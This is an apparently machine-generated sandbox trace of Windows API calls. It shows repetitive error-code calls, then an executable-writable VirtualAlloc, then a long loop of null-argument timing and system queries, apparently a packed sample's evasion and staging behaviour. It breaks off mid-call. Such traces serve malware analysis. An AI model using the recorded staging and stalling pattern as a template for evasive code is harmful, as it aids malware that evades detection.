[0099.448] GetLastError () returned 0x0 [0099.448] SetLastError (dwErrCode=0x0) [0099.448] GetLastError () returned 0x0 [0099.448] SetLastError (dwErrCode=0x0) [0099.449] GetLastError () returned 0x0 [0099.449] SetLastError (dwErrCode=0x0) [0099.449] GetLastError () returned 0x0 [0099.449] SetLastError (dwErrCode=0x0) [0099.449] GetLastError () returned 0x0 [0099.449] SetLastError (dwErrCode=0x0) [0099.449] GetLastError () returned 0x0 [0099.449] SetLastError (dwErrCode=0x0) [0099.449] GetLastError () returned 0x0 [0099.449] SetLastError (dwErrCode=0x0) [0099.449] GetLastError () returned 0x0 [0099.450] SetLastError (dwErrCode=0x0) [0099.450] GetLastError () returned 0x0 [0099.450] SetLastError (dwErrCode=0x0) [0099.450] GetLastError () returned 0x0 [0099.450] SetLastError (dwErrCode=0x0) [0099.450] GetLastError () returned 0x0 [0099.450] SetLastError (dwErrCode=0x0) [0099.450] GetLastError () returned 0x0 [0099.450] SetLastError (dwErrCode=0x0) [0099.451] GetLastError () returned 0x0 [0099.451] SetLastError (dwErrCode=0x0) [0099.451] GetLastError () returned 0x0 [0099.451] SetLastError (dwErrCode=0x0) [0099.451] GetLastError () returned 0x0 [0099.451] SetLastError (dwErrCode=0x0) [0099.451] GetLastError () returned 0x0 [0099.451] SetLastError (dwErrCode=0x0) [0099.452] GetLastError () returned 0x0 [0099.452] SetLastError (dwErrCode=0x0) [0099.452] GetLastError () returned 0x0 [0099.452] SetLastError (dwErrCode=0x0) [0099.452] GetLastError () returned 0x0 [0099.452] SetLastError (dwErrCode=0x0) [0099.452] GetLastError () returned 0x0 [0099.452] SetLastError (dwErrCode=0x0) [0099.452] GetLastError () returned 0x0 [0099.452] SetLastError (dwErrCode=0x0) [0099.452] GetLastError () returned 0x0 [0099.452] SetLastError (dwErrCode=0x0) [0099.452] GetLastError () returned 0x0 [0099.452] SetLastError (dwErrCode=0x0) [0099.452] GetLastError () returned 0x0 [0099.453] SetLastError (dwErrCode=0x0) [0099.453] GetLastError () returned 0x0 [0099.453] SetLastError (dwErrCode=0x0) [0099.453] GetLastError () returned 0x0 [0099.453] SetLastError (dwErrCode=0x0) [0099.453] GetLastError () returned 0x0 [0099.453] SetLastError (dwErrCode=0x0) [0099.453] GetLastError () returned 0x0 [0099.453] SetLastError (dwErrCode=0x0) [0099.453] GetLastError () returned 0x0 [0099.453] SetLastError (dwErrCode=0x0) [0099.453] GetLastError () returned 0x0 [0099.453] SetLastError (dwErrCode=0x0) [0099.453] GetLastError () returned 0x0 [0099.453] SetLastError (dwErrCode=0x0) [0099.453] GetLastError () returned 0x0 [0099.454] SetLastError (dwErrCode=0x0) [0099.454] GetLastError () returned 0x0 [0099.454] SetLastError (dwErrCode=0x0) [0099.454] GetLastError () returned 0x0 [0099.454] SetLastError (dwErrCode=0x0) [0099.454] GetLastError () returned 0x0 [0099.454] SetLastError (dwErrCode=0x0) [0099.454] GetLastError () returned 0x0 [0099.454] SetLastError (dwErrCode=0x0) [0099.454] GetLastError () returned 0x0 [0099.454] SetLastError (dwErrCode=0x0) [0099.454] GetLastError () returned 0x0 [0099.454] SetLastError (dwErrCode=0x0) [0099.454] GetLastError () returned 0x0 [0099.454] SetLastError (dwErrCode=0x0) [0099.454] GetLastError () returned 0x0 [0099.454] SetLastError (dwErrCode=0x0) [0099.455] GetLastError () returned 0x0 [0099.455] SetLastError (dwErrCode=0x0) [0099.455] GetLastError () returned 0x0 [0099.455] SetLastError (dwErrCode=0x0) [0099.455] GetLastError () returned 0x0 [0099.455] SetLastError (dwErrCode=0x0) [0099.455] GetLastError () returned 0x0 [0099.455] SetLastError (dwErrCode=0x0) [0099.455] GetLastError () returned 0x0 [0099.455] SetLastError (dwErrCode=0x0) [0099.455] GetLastError () returned 0x0 [0099.455] SetLastError (dwErrCode=0x0) [0099.455] GetLastError () returned 0x0 [0099.455] SetLastError (dwErrCode=0x0) [0099.455] GetLastError () returned 0x0 [0099.455] SetLastError (dwErrCode=0x0) [0099.455] GetLastError () returned 0x0 [0099.456] SetLastError (dwErrCode=0x0) [0099.456] GetLastError () returned 0x0 [0099.456] SetLastError (dwErrCode=0x0) [0099.456] GetLastError () returned 0x0 [0099.456] SetLastError (dwErrCode=0x0) [0099.456] GetLastError () returned 0x0 [0099.456] SetLastError (dwErrCode=0x0) [0099.456] GetLastError () returned 0x0 [0099.456] SetLastError (dwErrCode=0x0) [0099.456] GetLastError () returned 0x0 [0099.456] SetLastError (dwErrCode=0x0) [0099.456] GetLastError () returned 0x0 [0099.456] SetLastError (dwErrCode=0x0) [0099.456] GetLastError () returned 0x0 [0099.456] SetLastError (dwErrCode=0x0) [0099.456] GetLastError () returned 0x0 [0099.456] SetLastError (dwErrCode=0x0) [0099.457] GetLastError () returned 0x0 [0099.457] SetLastError (dwErrCode=0x0) [0099.457] GetLastError () returned 0x0 [0099.457] SetLastError (dwErrCode=0x0) [0099.457] GetLastError () returned 0x0 [0099.457] SetLastError (dwErrCode=0x0) [0099.457] GetLastError () returned 0x0 [0099.457] SetLastError (dwErrCode=0x0) [0099.457] GetLastError () returned 0x0 [0099.457] SetLastError (dwErrCode=0x0) [0099.457] GetLastError () returned 0x0 [0099.457] SetLastError (dwErrCode=0x0) [0099.458] GetLastError () returned 0x0 [0099.458] SetLastError (dwErrCode=0x0) [0099.458] GetLastError () returned 0x0 [0099.458] SetLastError (dwErrCode=0x0) [0099.458] GetLastError () returned 0x0 [0099.458] SetLastError (dwErrCode=0x0) [0099.458] GetLastError () returned 0x0 [0099.458] SetLastError (dwErrCode=0x0) [0099.458] GetLastError () returned 0x0 [0099.458] SetLastError (dwErrCode=0x0) [0099.458] GetLastError () returned 0x0 [0099.458] SetLastError (dwErrCode=0x0) [0099.458] GetLastError () returned 0x0 [0099.458] SetLastError (dwErrCode=0x0) [0099.458] GetLastError () returned 0x0 [0099.458] SetLastError (dwErrCode=0x0) [0099.458] GetLastError () returned 0x0 [0099.459] SetLastError (dwErrCode=0x0) [0099.459] GetLastError () returned 0x0 [0099.459] SetLastError (dwErrCode=0x0) [0099.459] GetLastError () returned 0x0 [0099.459] SetLastError (dwErrCode=0x0) [0099.459] GetLastError () returned 0x0 [0099.459] SetLastError (dwErrCode=0x0) [0099.459] GetLastError () returned 0x0 [0099.459] SetLastError (dwErrCode=0x0) [0099.459] GetLastError () returned 0x0 [0099.459] SetLastError (dwErrCode=0x0) [0099.459] GetLastError () returned 0x0 [0099.459] SetLastError (dwErrCode=0x0) [0099.459] GetLastError () returned 0x0 [0099.459] SetLastError (dwErrCode=0x0) [0099.459] GetLastError () returned 0x0 [0099.459] SetLastError (dwErrCode=0x0) [0099.459] GetLastError () returned 0x0 [0099.460] SetLastError (dwErrCode=0x0) [0099.461] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x74650000 [0099.461] GetProcAddress (hModule=0x74650000, lpProcName="LocalAlloc") returned 0x74667a30 [0099.461] LocalAlloc (uFlags=0x0, uBytes=0x7f80) returned 0x31e1f48 [0099.462] VirtualAlloc (lpAddress=0x0, dwSize=0x7f80, flAllocationType=0x1000, flProtect=0x40) returned 0x30e0000 [0099.462] GetTickCount () returned 0x2004fdb [0099.462] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.462] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.462] GetTickCount () returned 0x2004fdb [0099.463] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.463] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.463] GetTickCount () returned 0x2004fdb [0099.463] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.463] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.463] GetTickCount () returned 0x2004fdb [0099.463] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.463] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.463] GetTickCount () returned 0x2004fdb [0099.463] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.463] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.463] GetTickCount () returned 0x2004fdb [0099.463] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.463] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.463] GetTickCount () returned 0x2004fdb [0099.463] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.463] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.463] GetTickCount () returned 0x2004fdb [0099.464] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.464] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.464] GetTickCount () returned 0x2004fdb [0099.464] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.464] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.464] GetTickCount () returned 0x2004fdb [0099.464] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.464] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.464] GetTickCount () returned 0x2004fdb [0099.464] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.464] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.464] GetTickCount () returned 0x2004fdb [0099.464] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.464] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.464] GetTickCount () returned 0x2004fdb [0099.464] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.464] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.465] GetTickCount () returned 0x2004fdb [0099.465] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.472] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.472] GetTickCount () returned 0x2004fdb [0099.472] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.472] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.473] GetTickCount () returned 0x2004fdb [0099.473] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.473] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.473] GetTickCount () returned 0x2004fdb [0099.473] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.473] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.473] GetTickCount () returned 0x2004fdb [0099.473] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.473] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.473] GetTickCount () returned 0x2004fdb [0099.473] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.474] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.474] GetTickCount () returned 0x2004fdb [0099.474] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.474] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.474] GetTickCount () returned 0x2004fdb [0099.474] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.474] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.474] GetTickCount () returned 0x2004fdb [0099.474] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.474] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.474] GetTickCount () returned 0x2004fdb [0099.474] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.474] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.474] GetTickCount () returned 0x2004fdb [0099.474] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.474] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.474] GetTickCount () returned 0x2004fdb [0099.475] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.475] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.475] GetTickCount () returned 0x2004fdb [0099.475] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.475] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.475] GetTickCount () returned 0x2004fdb [0099.475] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.475] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.475] GetTickCount () returned 0x2004fdb [0099.475] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.475] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.475] GetTickCount () returned 0x2004fea [0099.475] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.475] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.475] GetTickCount () returned 0x2004fea [0099.475] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.475] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.475] GetTickCount () returned 0x2004fea [0099.476] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.476] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.476] GetTickCount () returned 0x2004fea [0099.476] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.476] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.476] GetTickCount () returned 0x2004fea [0099.476] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.476] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.476] GetTickCount () returned 0x2004fea [0099.476] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.476] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.476] GetTickCount () returned 0x2004fea [0099.476] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.476] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.476] GetTickCount () returned 0x2004fea [0099.476] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.476] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.477] GetTickCount () returned 0x2004fea [0099.477] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.477] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.477] GetTickCount () returned 0x2004fea [0099.477] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.477] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.477] GetTickCount () returned 0x2004fea [0099.477] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.477] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.477] GetTickCount () returned 0x2004fea [0099.477] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.477] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.477] GetTickCount () returned 0x2004fea [0099.477] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.477] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.477] GetTickCount () returned 0x2004fea [0099.477] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.478] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.478] GetTickCount () returned 0x2004fea [0099.478] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.478] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.478] GetTickCount () returned 0x2004fea [0099.478] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.478] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.478] GetTickCount () returned 0x2004fea [0099.478] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.478] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.478] GetTickCount () returned 0x2004fea [0099.478] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.478] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.479] GetTickCount () returned 0x2004fea [0099.479] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.479] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.484] GetTickCount () returned 0x2004fea [0099.484] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.485] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.485] GetTickCount () returned 0x2004fea [0099.485] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.485] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.485] GetTickCount () returned 0x2004fea [0099.485] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.485] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.485] GetTickCount () returned 0x2004fea [0099.485] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.485] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.485] GetTickCount () returned 0x2004fea [0099.485] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.485] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.486] GetTickCount () returned 0x2004fea [0099.486] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.486] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.486] GetTickCount () returned 0x2004fea [0099.486] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.486] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.486] GetTickCount () returned 0x2004fea [0099.486] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.486] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.486] GetTickCount () returned 0x2004fea [0099.486] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.486] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.487] GetTickCount () returned 0x2004fea [0099.487] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.487] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.487] GetTickCount () returned 0x2004fea [0099.487] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.487] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.487] GetTickCount () returned 0x2004fea [0099.487] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.487] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.487] GetTickCount () returned 0x2004fea [0099.487] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.487] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.487] GetTickCount () returned 0x2004fea [0099.487] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.488] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.488] GetTickCount () returned 0x2004fea [0099.488] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.488] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.488] GetTickCount () returned 0x2004fea [0099.488] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.488] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: 